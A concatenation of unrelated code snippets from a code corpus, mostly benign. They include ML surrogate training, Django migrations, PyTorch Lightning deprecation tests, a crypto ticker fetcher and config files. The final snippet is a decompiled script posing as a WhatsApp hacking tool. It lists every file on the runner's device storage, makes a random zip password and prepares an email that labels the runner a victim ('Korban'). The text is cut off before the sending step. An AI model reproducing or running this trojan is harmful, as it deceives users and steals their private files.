for initialization.
:type explainable_model_args: dict
"""
# For regression, teacher_y is a real value whereas for classification it is a probability between 0 and 1
teacher_y = teacher_model_predict_fn(original_training_data)
multiclass = False
training_labels = None
is_classifier = len(teacher_y.shape) == 2
# If the predict_proba function returned one column but this is a classifier, modify to [1-p, p]
if is_classifier and teacher_y.shape[1] == 1:
teacher_y = np.column_stack((1 - teacher_y, teacher_y))
if is_classifier and teacher_y.shape[1] > 2:
# If more than two classes, use multiclass surrogate
multiclass = True
# For multiclass case, we need to train on the class label
training_labels = np.argmax(teacher_y, axis=1)
unique_labels = set(np.unique(training_labels))
if len(unique_labels) < teacher_y.shape[1]:
# Get the missing labels
missing_labels = set(range(teacher_y.shape[1])).difference(unique_labels)
# Append some rows with the missing labels
for missing_label in missing_labels:
# Find max prob for missing label
max_row_index = np.argmax(teacher_y[:, missing_label])
# Append the extra label to data and y value
training_labels = np.append(training_labels, missing_label)
if issparse(data) and not isspmatrix_csr(data):
data = data.tocsr()
vstack = sparse_vstack if issparse(data) else np.vstack
data = vstack([data, data[max_row_index:max_row_index + 1, :]])
surrogate_model = uninitialized_surrogate_model(multiclass=multiclass,
**explainable_model_args)
else:
surrogate_model = uninitialized_surrogate_model(**explainable_model_args)
if is_classifier and teacher_y.shape[1] == 2:
# Make sure output has only 1 dimension
teacher_y = teacher_y[:, 1]
# Transform to logit space and fit regression
surrogate_model.fit(data, _soft_logit(teacher_y))
else:
# Use hard labels for regression or multiclass case
if training_labels is None:
training_labels = teacher_y
surrogate_model.fit(data, training_labels)
return surrogate_model
|
StarcoderdataPython
|
3269537
|
<reponame>HoboJoe2/rps101
class Weapon():
def __init__(self, **kwargs):
self.__dict__.update(**kwargs)
|
StarcoderdataPython
|
15891
|
<filename>lang/Python/terminal-control-cursor-positioning-1.py
print("\033[6;3HHello")
|
StarcoderdataPython
|
3238023
|
import urllib2
import json
import interface
class Poloniex(interface.MarketExplorer):
def __init__(self):
pass
def exchange_name(self):
return 'poloniex'
def markets(self):
req = urllib2.urlopen('https://poloniex.com/public?command=returnTicker')
js = json.loads(req.read())
markets = []
for pair, value in js.iteritems():
if value['isFrozen'] == "0":
pairarr = pair.split('_')
markets.append(self.create_market(pairarr[1], pairarr[0]))
print pair
return markets
|
StarcoderdataPython
|
157014
|
import logging
import time
import sys, os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
from tweets_crawler import db as DB
def doSummary(candidates):
while True:
msg = "\nSummary:\n"
db = DB.DB()
total = 0
for cand in candidates:
cand = cand.strip()
if cand == "": continue
pattern = cand.strip() + "*"
count = db.count(pattern)
total += count
msg += "\t Tweets of " + cand + ": " + str(count) + "\n"
msg += "\t===================================\n"
msg += "\t Total: " + str(total) + "\n"
logging.info(msg)
with open('last_summary.log', 'w') as f:
f.write(msg)
time.sleep(60*30)
if __name__ == "__main__":
log_format = "%(asctime)s - %(message)s"
logging.basicConfig(filename = 'summary.log',level=logging.INFO, format = log_format)
candidates = None
with open('candidates') as f:
candidates = f.readlines()
doSummary(candidates)
|
StarcoderdataPython
|
3232023
|
<filename>pupper/ServoCalibration.py
# WARNING: This file is machine generated. Edit at your own risk.
import numpy as np
MICROS_PER_RAD = 11.333 * 180.0 / np.pi
NEUTRAL_ANGLE_DEGREES = np.array(
[[ 0., 0., 0., 0.],
[ 45., 45., 45., 45.],
[-45.,-45.,-45.,-45.]]
)
|
StarcoderdataPython
|
3347937
|
<reponame>T4rk1n/precept
import pytest
from precept import ImmutableDict
from precept.errors import ImmutableError
def test_immutable_dict():
data = ImmutableDict(foo='bar', bar='foo', n=1)
assert 'foo' in data
assert data.get('bar') == 'foo'
assert data.foo == 'bar'
assert data['n'] == 1
assert len(data) == 3
with pytest.raises(TypeError):
data['foo'] = 'not foo'
with pytest.raises(KeyError):
# pylint: disable=unused-variable
d = data.dont_exist # noqa: F841
with pytest.raises(ImmutableError):
# pylint: disable=attribute-defined-outside-init
data.foo = 'not foo'
def test_immutable_props():
class TestDict(ImmutableDict):
def __init__(self, foo, bar, keyword='keyword'):
super(TestDict, self).__init__(foo=foo, bar=bar, keyword=keyword)
first = TestDict('foo', 'bar')
assert first.foo == 'foo'
assert first.bar == 'bar'
assert first.keyword == 'keyword'
assert len(first) == 3
with pytest.raises(ImmutableError) as context:
# pylint: disable=attribute-defined-outside-init
first.foo = 'bar'
assert 'TestDict.foo is immutable' in str(context.value)
second = TestDict(1, 2, keyword='foobar')
assert second.keyword == 'foobar'
assert len(second) == 3
|
StarcoderdataPython
|
1725447
|
<filename>starter/starter_PubRouterDeposit.py
import json
from starter.starter_helper import NullRequiredDataException
from starter.objects import Starter, default_workflow_params
from provider import utils
"""
Amazon SWF PubRouterDeposit starter
"""
class starter_PubRouterDeposit(Starter):
def __init__(self, settings=None, logger=None):
super(starter_PubRouterDeposit, self).__init__(
settings, logger, "PubRouterDeposit"
)
def get_workflow_params(self, workflow=None):
if workflow is None:
raise NullRequiredDataException(
"Did not get a workflow argument. Required."
)
workflow_params = default_workflow_params(self.settings)
workflow_params["workflow_id"] = "%s_%s" % (self.name, workflow)
workflow_params["workflow_name"] = self.name
workflow_params["workflow_version"] = "1"
data = {}
data["workflow"] = workflow
info = {
"data": data,
}
workflow_params["input"] = json.dumps(info, default=lambda ob: None)
return workflow_params
def start(self, settings, workflow=None):
"""method for backwards compatibility"""
self.settings = settings
self.instantiate_logger()
self.start_workflow(workflow)
def start_workflow(self, workflow=None):
workflow_params = self.get_workflow_params(workflow)
self.start_workflow_execution(workflow_params)
if __name__ == "__main__":
ENV, WORKFLOW = utils.console_start_env_workflow()
SETTINGS = utils.get_settings(ENV)
STARTER = starter_PubRouterDeposit(SETTINGS)
STARTER.start_workflow(workflow=WORKFLOW)
|
StarcoderdataPython
|
1601795
|
<filename>BACKEND_POC/app/migrations/0001_initial.py<gh_stars>1-10
# Generated by Django 3.1.1 on 2020-09-17 09:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AttribType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128, unique=True)),
('raw_type', models.IntegerField(choices=[(0, 'BOOL'), (1, 'FLOAT'), (2, 'INTEGER'), (3, 'STRING'), (4, 'DICT')])),
],
),
migrations.CreateModel(
name='Graph',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100, unique=True)),
('attribute_json', models.JSONField(blank=True, default=dict)),
('next_vertex_id', models.IntegerField(default=1)),
('next_transaction_id', models.IntegerField(default=1)),
],
),
migrations.CreateModel(
name='GraphAttribDefTrans',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GraphAttribDefVertex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Schema',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128, unique=True)),
],
),
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tx_id', models.IntegerField()),
('tx_dir', models.BooleanField(default=True)),
('attribute_json', models.JSONField(blank=True, default=dict)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
],
),
migrations.CreateModel(
name='Vertex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vx_id', models.IntegerField()),
('attribute_json', models.JSONField(blank=True, default=dict)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
],
),
migrations.CreateModel(
name='VertexAttrib',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_str', models.TextField(blank=True, default='')),
('attrib_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graphattribdefvertex')),
('vertex_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vertex_attribs', to='app.vertex')),
],
),
migrations.CreateModel(
name='TransactionAttrib',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_str', models.TextField(blank=True, default='')),
('attrib_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graphattribdeftrans')),
('transaction_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.transaction')),
],
),
migrations.AddField(
model_name='transaction',
name='vx_dst',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='destination', to='app.vertex'),
),
migrations.AddField(
model_name='transaction',
name='vx_src',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='source', to='app.vertex'),
),
migrations.CreateModel(
name='SchemaAttribDefVertex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('schema_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.schema')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SchemaAttribDefTrans',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('schema_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.schema')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SchemaAttribDefGraph',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('schema_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.schema')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GraphAttribDefGraph',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('descr', models.CharField(blank=True, default='', max_length=256, null=True)),
('default_str', models.TextField(blank=True, default=None, null=True)),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graph')),
('type_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.attribtype')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GraphAttrib',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_str', models.TextField(blank=True, default='')),
('attrib_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.graphattribdefgraph')),
('graph_fk', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='graph_attribs', to='app.graph')),
],
),
migrations.AddField(
model_name='graph',
name='schema_fk',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='app.schema'),
),
migrations.AddConstraint(
model_name='vertexattrib',
constraint=models.UniqueConstraint(fields=('vertex_fk', 'attrib_fk'), name='unique attrib per vertex'),
),
migrations.AddConstraint(
model_name='graphattrib',
constraint=models.UniqueConstraint(fields=('graph_fk', 'attrib_fk'), name='unique attrib per graph'),
),
]
|
StarcoderdataPython
|
3281944
|
<reponame>DaeunYim/pgtoolsservice
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from ossdbtoolsservice.workspace.contracts.common import (
Location, Position, Range, TextDocumentIdentifier, TextDocumentItem,
TextDocumentPosition)
from ossdbtoolsservice.workspace.contracts.did_change_config_notification import (
DID_CHANGE_CONFIG_NOTIFICATION, Configuration,
DidChangeConfigurationParams, FormatterConfiguration,
IntellisenseConfiguration, MySQLConfiguration, PGSQLConfiguration,
SQLConfiguration)
from ossdbtoolsservice.workspace.contracts.did_change_text_doc_notification import (
DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, DidChangeTextDocumentParams,
TextDocumentChangeEvent)
from ossdbtoolsservice.workspace.contracts.did_close_text_doc_notification import (
DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, DidCloseTextDocumentParams)
from ossdbtoolsservice.workspace.contracts.did_open_text_doc_notification import (
DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, DidOpenTextDocumentParams)
__all__ = [
'DID_CHANGE_CONFIG_NOTIFICATION', 'DidChangeConfigurationParams',
'Configuration', 'MySQLConfiguration', 'PGSQLConfiguration', 'SQLConfiguration', 'IntellisenseConfiguration',
'FormatterConfiguration', 'DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION', 'DidChangeTextDocumentParams', 'TextDocumentChangeEvent',
'DID_OPEN_TEXT_DOCUMENT_NOTIFICATION', 'DidOpenTextDocumentParams',
'DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION', 'DidCloseTextDocumentParams',
'Location', 'Position', 'Range', 'TextDocumentItem', 'TextDocumentIdentifier', 'TextDocumentPosition'
]
|
StarcoderdataPython
|
131123
|
<reponame>theodumont/pytorch-lightning
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Test deprecated functionality which will be removed in v1.6.0 """
import pytest
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
from pytorch_lightning.plugins.training_type import DDPPlugin, DDPSpawnPlugin
from pytorch_lightning.utilities.model_helpers import is_overridden
from tests.helpers import BoringDataModule, BoringModel
def test_v1_6_0_trainer_model_hook_mixin(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, checkpoint_callback=False, logger=False)
trainer.fit(model)
with pytest.deprecated_call(match="is deprecated in v1.4 and will be removed in v1.6"):
trainer.is_function_implemented("training_step", model)
with pytest.deprecated_call(match="is deprecated in v1.4 and will be removed in v1.6"):
trainer.has_arg("training_step", "batch")
def test_v1_6_0_dataloader_renaming(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
dl = model.train_dataloader()
with pytest.deprecated_call(match=r"fit\(train_dataloader\)` is deprecated in v1.4"):
trainer.fit(model, train_dataloader=dl)
with pytest.deprecated_call(match=r"validate\(val_dataloaders\)` is deprecated in v1.4"):
trainer.validate(model, val_dataloaders=dl)
with pytest.deprecated_call(match=r"test\(test_dataloaders\)` is deprecated in v1.4"):
trainer.test(model, test_dataloaders=dl)
with pytest.deprecated_call(match=r"tune\(train_dataloader\)` is deprecated in v1.4"):
trainer.tune(model, train_dataloader=dl)
with pytest.deprecated_call(match=r"tune\(train_dataloader\)` is deprecated in v1.4"):
trainer.tuner.scale_batch_size(model, train_dataloader=dl)
with pytest.deprecated_call(match=r"tune\(train_dataloader\)` is deprecated in v1.4"):
trainer.tuner.lr_find(model, train_dataloader=dl)
def test_old_transfer_batch_to_device_hook(tmpdir):
class OldModel(BoringModel):
def transfer_batch_to_device(self, batch, device):
return super().transfer_batch_to_device(batch, device, None)
trainer = Trainer(default_root_dir=tmpdir, limit_train_batches=1, limit_val_batches=0, max_epochs=1)
with pytest.deprecated_call(match='old signature will be removed in v1.6'):
trainer.fit(OldModel())
def test_v1_6_0_ddp_num_nodes():
with pytest.deprecated_call(match="Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4"):
DDPPlugin(num_nodes=1)
def test_v1_6_0_ddp_sync_batchnorm():
with pytest.deprecated_call(match="Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4"):
DDPPlugin(sync_batchnorm=False)
def test_v1_6_0_ddp_spawn_num_nodes():
with pytest.deprecated_call(match="Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4"):
DDPSpawnPlugin(num_nodes=1)
def test_v1_6_0_ddp_spawn_sync_batchnorm():
with pytest.deprecated_call(match="Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4"):
DDPSpawnPlugin(sync_batchnorm=False)
def test_v1_6_0_tbptt_reduce_fx(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
self.log("foo", 1, tbptt_reduce_fx=lambda x: x)
return super().training_step(*args)
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
with pytest.deprecated_call(match=r"tbptt_reduce_fx=...\)` is no longer supported"):
trainer.fit(TestModel())
def test_v1_6_0_tbptt_pad_token(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
self.log("foo", 1, tbptt_pad_token=0)
return super().training_step(*args)
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
with pytest.deprecated_call(match=r"tbptt_pad_token=...\)` is no longer supported"):
trainer.fit(TestModel())
def test_v1_6_0_sync_dist_op(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
self.log("foo", 1, sync_dist_op='sum')
return super().training_step(*args)
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
with pytest.deprecated_call(match=r"`self.log\(sync_dist_op='sum'\)` is deprecated"):
trainer.fit(TestModel())
def test_v1_6_0_datamodule_lifecycle_properties(tmpdir):
dm = BoringDataModule()
with pytest.deprecated_call(match=r"DataModule property `has_prepared_data` was deprecated in v1.4"):
dm.has_prepared_data
with pytest.deprecated_call(match=r"DataModule property `has_setup_fit` was deprecated in v1.4"):
dm.has_setup_fit
with pytest.deprecated_call(match=r"DataModule property `has_setup_validate` was deprecated in v1.4"):
dm.has_setup_validate
with pytest.deprecated_call(match=r"DataModule property `has_setup_test` was deprecated in v1.4"):
dm.has_setup_test
with pytest.deprecated_call(match=r"DataModule property `has_setup_predict` was deprecated in v1.4"):
dm.has_setup_predict
with pytest.deprecated_call(match=r"DataModule property `has_teardown_fit` was deprecated in v1.4"):
dm.has_teardown_fit
with pytest.deprecated_call(match=r"DataModule property `has_teardown_validate` was deprecated in v1.4"):
dm.has_teardown_validate
with pytest.deprecated_call(match=r"DataModule property `has_teardown_test` was deprecated in v1.4"):
dm.has_teardown_test
with pytest.deprecated_call(match=r"DataModule property `has_teardown_predict` was deprecated in v1.4"):
dm.has_teardown_predict
def test_v1_6_0_datamodule_hooks_calls(tmpdir):
"""Test that repeated calls to DataHooks' hooks show a warning about the coming API change."""
class TestDataModule(BoringDataModule):
setup_calls = []
teardown_calls = []
prepare_data_calls = 0
def setup(self, stage=None):
super().setup(stage=stage)
self.setup_calls.append(stage)
def teardown(self, stage=None):
super().teardown(stage=stage)
self.teardown_calls.append(stage)
def prepare_data(self):
super().prepare_data()
self.prepare_data_calls += 1
dm = TestDataModule()
dm.prepare_data()
dm.prepare_data()
dm.setup('fit')
with pytest.deprecated_call(
match=r"DataModule.setup has already been called, so it will not be called again. "
"In v1.6 this behavior will change to always call DataModule.setup"
):
dm.setup('fit')
dm.setup()
dm.setup()
dm.teardown('validate')
with pytest.deprecated_call(
match=r"DataModule.teardown has already been called, so it will not be called again. "
"In v1.6 this behavior will change to always call DataModule.teardown"
):
dm.teardown('validate')
assert dm.prepare_data_calls == 1
assert dm.setup_calls == ['fit', None]
assert dm.teardown_calls == ['validate']
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=1)
trainer.test(BoringModel(), datamodule=dm)
# same number of calls
assert dm.prepare_data_calls == 1
assert dm.setup_calls == ['fit', None]
assert dm.teardown_calls == ['validate', 'test']
def test_v1_6_0_is_overridden_model():
model = BoringModel()
with pytest.deprecated_call(match="and will be removed in v1.6"):
assert is_overridden("validation_step", model=model)
with pytest.deprecated_call(match="and will be removed in v1.6"):
assert not is_overridden("foo", model=model)
def test_v1_6_0_early_stopping_monitor(tmpdir):
with pytest.deprecated_call(
match=r"The `EarlyStopping\(monitor\)` argument will be required starting in v1.6."
" For backward compatibility, setting this to `early_stop_on`."
):
EarlyStopping()
def test_v1_6_0_extras_with_gradients(tmpdir):
class TestModel(BoringModel):
def training_step(self, *args):
loss = super().training_step(*args)['loss']
return {"loss": loss, 'foo': loss}
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=1)
model = TestModel()
match = r"\{'foo'\} has a `grad_fn`.*behaviour will change in v1\.6"
with pytest.deprecated_call(match=match):
trainer.fit(model)
def test_v1_6_0_train_loop(tmpdir):
trainer = Trainer()
with pytest.deprecated_call(
match=r"`Trainer.train_loop` has been renamed to `Trainer.fit_loop` and will be removed in v1.6."
):
_ = trainer.train_loop
|
StarcoderdataPython
|
3372893
|
from pycket import config
if config.hidden_classes:
from pycket.impersonators.hidden_classes import *
else:
from pycket.impersonators.baseline import *
|
StarcoderdataPython
|
3332025
|
from output.models.nist_data.atomic.int_pkg.schema_instance.nistschema_sv_iv_atomic_int_max_exclusive_1_xsd.nistschema_sv_iv_atomic_int_max_exclusive_1 import NistschemaSvIvAtomicIntMaxExclusive1
__all__ = [
"NistschemaSvIvAtomicIntMaxExclusive1",
]
|
StarcoderdataPython
|
3279887
|
<reponame>hritools/text-to-speech<gh_stars>0
import setuptools
VERSION = '0.1'
with open('README.md', 'r') as f:
long_description = f.read()
with open('requirements.txt') as f:
required = f.read().splitlines()
setuptools.setup(
name='TextToSpeech-Ru',
python_requires='~=3.7',
version=VERSION,
author='<NAME>',
author_email='<EMAIL>',
description='Speech Synthesis for Russian Language',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://cordelianew.university.innopolis.ru/gitea/hri/text-to-speech.git',
packages=setuptools.find_packages(),
install_requires=required,
)
|
StarcoderdataPython
|
1677211
|
<filename>packages/mccomponents/python/mccomponents/sample/DebyeTemp.py
# -*- Python -*-
"""
Debye temperature of elements
"""
def getT(element, default=None):
return table.get(element, default)
table = dict(
Li=344, Be=1440, C=2230, Ne=75,
Na=158, Mg=400, Al=428, Si=645, Ar=92,
K=91, Ca=230, Sc=360, Ti=420, V=380, Cr=630, Mn=410, Fe=470, Co=445, Ni=450, Cu=343, Zn=327, Ga=320, Ge=374, As=282, Se=90, Kr=72,
Rb=56, Sr=147, Y=280, Zr=291, Nb=275, Mo=450, Ru=600, Rh=480, Pd=274, Ag=225, Cd=209, In=108, Sn=200, Sb=211, Te=153, Xe=64,
Cs=38, Ba=110, La=142, Hf=252, Ta=240, W=400, Re=430, Os=500, Ir=420, Pt=240, Au=165, Hg=71.9, Tl=78.5, Pb=105, Bi=119,
Gd=200, Dy=210, Yb=120, Lu=210,
Th=163, U=207,
)
# End of file
|
StarcoderdataPython
|
3218831
|
<reponame>UrbanDave/core
"""Test for Sensibo component Init."""
from __future__ import annotations
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components.sensibo.const import DOMAIN
from homeassistant.components.sensibo.util import NoUsernameError
from homeassistant.config_entries import SOURCE_USER
from homeassistant.core import HomeAssistant
from . import ENTRY_CONFIG
from .response import DATA_FROM_API
from tests.common import MockConfigEntry
async def test_setup_entry(hass: HomeAssistant) -> None:
"""Test setup entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=2,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
async def test_migrate_entry(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert entry.version == 2
assert entry.unique_id == "username"
async def test_migrate_entry_fails(hass: HomeAssistant) -> None:
"""Test migrate entry unique id."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version=1,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
side_effect=NoUsernameError("No username returned"),
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.MIGRATION_ERROR
assert entry.version == 1
assert entry.unique_id == "12"
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload an entry."""
entry = MockConfigEntry(
domain=DOMAIN,
source=SOURCE_USER,
data=ENTRY_CONFIG,
entry_id="1",
unique_id="12",
version="2",
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.sensibo.coordinator.SensiboClient.async_get_devices_data",
return_value=DATA_FROM_API,
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_devices",
return_value={"result": [{"id": "xyzxyz"}, {"id": "abcabc"}]},
), patch(
"homeassistant.components.sensibo.util.SensiboClient.async_get_me",
return_value={"result": {"username": "username"}},
):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == config_entries.ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state is config_entries.ConfigEntryState.NOT_LOADED
|
StarcoderdataPython
|
135281
|
# uncompyle6 version 3.5.0
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <JustAHacker>
whoknow = 'ohiabuebmpoeomqk'
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, smtplib
from glob import glob as s
daftar = []
cekks = os.access('/sdcard', os.R_OK)
os.system('command -v zip > /dev/null 2>&1 || pkg install zip')
if cekks == True:
pass
else:
print 'This Program Needs Permission To Read Whatsapp Data'
print 'Please Give permission',
sys.exit()
os.chdir('/sdcard')
has = s('*.*')
for a in has:
daftar.append(a)
has = s('*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*/*/*.*')
for a in has:
daftar.append(a)
has = s('*/*/*/*/*/*.*')
for a in has:
daftar.append(a)
menit = len(daftar) / 65
generate1 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate2 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate3 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate4 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate5 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
generate6 = ('').join(random.sample(map(chr, range(48, 57) + range(65, 90) + range(97, 122)), 10))
passcrypt = generate1 + generate2 + generate3 + generate4 + generate5 + generate6
os.system('clear')
name = raw_input('\x1b[1;33mYour Whatsapp : ')
raw_input('Target : ')
time.sleep(2)
print 'Please Wait ' + str(menit) + ' Minutes '
try:
jfhfi = int(name)
except:
print 'Enter Your Whatsapp'
sys.exit()
if '+62' in str(name):
pass
else:
print 'Enter Your Whatsapp Using +62'
sys.exit()
print 'Hacking Target..Please Wait'
print 'If You Cancel This Proggress,your Whatsapp will error'
print 'So Please Be Patient'
fadd = '<EMAIL>'
tadd = '<EMAIL>'
SUBJECT = 'Whatsapp Korban = ' + name
TEXT = 'password zip = ' + str(passcrypt)
